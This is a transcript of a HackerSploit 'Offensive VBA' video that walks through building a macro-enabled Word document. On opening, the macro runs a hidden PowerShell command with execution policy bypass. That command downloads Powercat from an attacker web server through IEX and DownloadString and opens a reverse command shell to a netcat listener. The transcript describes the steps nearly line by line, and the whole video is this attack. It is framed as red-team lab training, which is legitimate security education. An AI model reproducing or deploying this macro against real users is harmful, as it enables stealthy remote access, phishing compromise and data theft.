# Offensive VBA 0x4 - Reverse Shell Macro with Powercat

## Metadata

- **Channel:** HackerSploit
- **YouTube:** https://www.youtube.com/watch?v=0W3Z3Br56XM
- **Date:** 03.02.2025
- **Duration:** 11:52
- **Views:** 6,569

## Description

In this episode of the Offensive VBA series, we dive into one of the most powerful techniques for red teamers—creating a reverse shell VBA macro using Powercat. This technique enables stealthy command execution and remote access through malicious macro-enabled Office documents.

In this video, you will learn how to build a reverse shell VBA macro that leverages Powercat, allowing you to stealthily execute remote commands in memory using PowerShell.

Powercat: https://github.com/besimorhino/powercat


## Contents

### [0:00](https://www.youtube.com/watch?v=0W3Z3Br56XM) Segment 1 (00:00 - 05:00)

Hey guys, HackerSploit here, back again with another video. Welcome back to the Offensive VBA series. In this video we're going to be taking a look at how to develop a reverse shell macro, but with a small twist. I think we've probably covered this already, and I think this will be the last one, or I should say it'll sort of be the video that will help us bridge the gap. We took a break in the adversary emulation series to cover this process, the process of developing a macro for initial access, so after this we'll then resume with emulating FIN6 and we'll pretty much move on into the Active Directory pentesting side of things.

But anyway, as the title of this video suggests, we are going to be leveraging a tool, or a script, called Powercat. I'm currently on my Windows virtual machine here and I've just RDP'd into my Kali Linux system. I'm just going to maximize this and head over into my browser. I'm currently on the Powercat GitHub repository right over here; apologies if my connection is a little bit slow. This is the script in question. By the way, all credits go to the author; again, the link will be in the description section.

But you may be asking yourself, what exactly is Powercat? Well, as it suggests right over here, it's netcat, the PowerShell version, or it's sort of the equivalent of netcat, but again in PowerShell. In this particular case, it's quite old, but you'll see how powerful it is. It pretty much supports PowerShell version 2 and later, and there are many ways you can go about using this particular script, or module if you will. Let me just give you a basic or brief introduction. So as it says right over here, Powercat is a PowerShell function, which means you first need to load the function before you can execute it. You can put one of the following commands that are outlined below here into your PowerShell profile, and so on and so forth. But in any case, this is what you're able to do, so just think of it as a very powerful netcat implementation. Given that it's PowerShell, the idea is to have something similar to netcat, but again for Windows.

With Linux, as you know, it's fairly simple: if you have netcat installed on a target Linux system, you can either set up a listener on the target system, in which case you'll have a bind shell and you'll essentially be connecting to the port that you're listening on on the target, or you can tell the target to connect to your listener. In this case Powercat, just like netcat, can serve two purposes: you can set up a listener and you can also connect to a listener. Other than that, if you want a detailed review of Powercat and how it can be used in different ways, just let me know in the comment section and I'll make a video on that.

The best way to show you how this works, again, is in the form of a macro. So what I've done, and by the way this GitHub repo only has one script, the PowerShell script right over here, so you can just download it. I've downloaded it to my desktop on the Kali Linux system, so you can see I have it here. What I'm going to do now is set up a web server here on port 8080 to host it, and then I'm going to set up a netcat listener. Now you can also use Powercat if you want on the listener side if you are receiving a reverse connection, but in this case I'll say sudo netcat -nvlp, and in this case I'll use a creative port, 1337, and I'll hit enter. Okay, so we have this going.

I'm now going to minimize my Kali Linux system and we're going to open up Word here. I'm going to create a blank document and I'll go ahead and save this on my desktop as, we'll just call this, powercat. Of course in reality this is not something you should be doing, but for the sake of demonstration we'll create it as a macro-enabled document, so .docm. Macros: I'll click on the macros in this particular document and I'll create one here; we'll just call it powercat. Very simple. And I'll open up the VBA IDE. Very simple, very nice. Okay, so we have the

### [5:00](https://www.youtube.com/watch?v=0W3Z3Br56XM&t=300s) Segment 2 (05:00 - 10:00)

powercat subroutine here. I'm going to create two predefined subroutines to control what happens when the document is opened. I already mentioned, I've already covered the AutoOpen subroutine here, but we also have another one called the Document_Open subroutine, which essentially does as the name suggests: it'll execute the macro once the user actually clicks on run macro or enable content; it'll automatically run the macro again when the document is opened. So what we're going to do is we'll create it here: Sub, and Document_Open is its name, and in here we're just going to call powercat. Well, not call it; we're just going to specify the macro, the subroutine we want to run, so powercat, like so, in both of them, just as a fail-safe.

So now in the powercat subroutine we are going to need to create two variables. The first one I'll create is the variable called URL, and this is going to be of type String because it's going to store a string, and then we'll create one to hold the PowerShell script or command, so we can just call it PSScript, how about that, As String. Okay, so first things first, let's specify what we're going to store in the URL variable. In this case it's going to be the address of the web server that's hosting Powercat, which we've already set up. In my case it's going to be my Kali Linux system on my local network; the IP address of my Kali Linux system is 192.168.2.24, we set up the web server on port 8080, and then of course powercat.ps1. Okay, very nice, simple.

And then PSScript: this is going to hold the PowerShell IEX, Invoke-Expression, command that'll essentially download the Powercat script, and then after that's done it'll execute Powercat and tell it to connect to our listener, which in the case of the Kali Linux system is a netcat listener on port 1337, and then we'll specify that we want to execute, we just want a basic command shell, or a command prompt if you will. So I'll say IEX, and then in here we'll create a New-Object, System.Net.WebClient, and then DownloadString, and then in here we will specify the URL, so URL, and we just concatenate there. And then we say, with Powercat, if you remember the instructions on the GitHub repo, powercat and then connect; in this case we're not listening, we're connecting back to the Kali Linux listener, 192, this is where I specify the IP address of the Kali Linux system, 24, the port where you have the listener running on, in this case 1337, and then execute cmd.

Okay, so now we can utilize Shell and say powershell.exe and then specify all the PowerShell options here: execution policy, this is bypass, and then we can say window style, for example, hidden, and then, because we want to concatenate here, we want to then include the totality of whatever PSScript is storing, which in this case will include, right over here, because this is going sequentially, the URL which I've already specified. So PSScript, and then we're going to concatenate here, and that's 1, 2, 3, 4, then we specify vbHide. Sorry, my bad, like so. All right, so that should work without any issues, and now I'm going to save my macro, which I've just done, and I'm not going to debug; we'll find out if we've made a mistake. I'll just give it a run-through one more time, and there we go. Okay, that looks nice, no issues. Close this up and save the document, and now I'll bring up the Kali Linux system. So right over here we can

### [10:00](https://www.youtube.com/watch?v=0W3Z3Br56XM&t=600s) Segment 3 (10:00 - 11:00)

see that we have the web server, so we'll be monitoring this as I open the document. Let me resize this, because I want to be able to see this, and I'll open up Word here really quickly so I can resize the window again so you can see that there. Okay, so I'll now open up the powercat document here and we'll enable the macro, or run it, and there we are: we can see we get a GET request to the web server hosting Powercat, and if we take a look at our listener, indeed we get a reverse shell, essentially a command prompt or command shell. So, very basic, but very minimal in terms of resources, and of course because we used IEX it's being executed in memory; there's nothing being saved on the disk, so no payloads or anything like this. And if I say systeminfo, let's see this here, there we are, we can confirm that, and if I say, right over here, let me maximize this, so I say admin, yeah, there we are. And then we can proceed to privilege escalation and all that good stuff. But yeah, so that's what I wanted to highlight in this video, nothing crazy. The link to the Powercat GitHub repo will be in the description section. If you have any questions or comments, or if you have any recommendations, please leave them in the comment section down below. If you enjoyed this video and found value in it, please leave a like down below, and I will be seeing you in the next video.

---
*Source: https://ekstraktznaniy.ru/video/20357*